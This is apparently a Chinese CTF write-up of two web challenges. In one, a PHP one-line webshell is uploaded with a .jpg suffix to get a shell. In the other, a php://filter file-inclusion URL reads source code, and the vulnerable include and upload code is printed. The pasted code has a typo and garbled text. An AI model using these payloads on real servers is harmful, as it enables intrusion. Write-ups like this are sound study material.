手速要快
在header中发现password
然后来到上传界面,上传一句话,bp抓包后缀加上.jpg
访问发现解析为php
getshell 读取flag
flag{698539765730b69026796420b9201e03}
image_up
打开以后发现url有page=
猜测存在文件包含
测试php伪协议
http://101.71.29.5:10007/index.php?page=php://filter/convert.base64-encode/resource=index
读到源码
<?php
if(isset($_GET['page'])){
if(!stristr($_GET['page'],"..")){
$page = $_GET['page'].".php";
include($page);
}else{
header("Location: index.php?page=login");
}
}else{
header("Location: index.php?page=login");
}
会在url后加.php
随手测试登陆发现能登陆,进入上传界面,再读upload源码
<?php
$error = "";
$exts = array("jpg","png","gif","jpeg");
if(!empty($_FILES["image"]))
{
$temp = explode(".", $_FILES["image"]["name"]);
$extension = end($temp);
if((@$_upfileS["image"]["size"] < 102400))
{
if(in_array($extension,$exts)){
$path = "uploads/".md5($temp[0].time()).".".$extension;
move_uploaded_file($_FILES["image"]["tmp_name"], $path);
$error = "涓婁紶鎴愬姛!";
}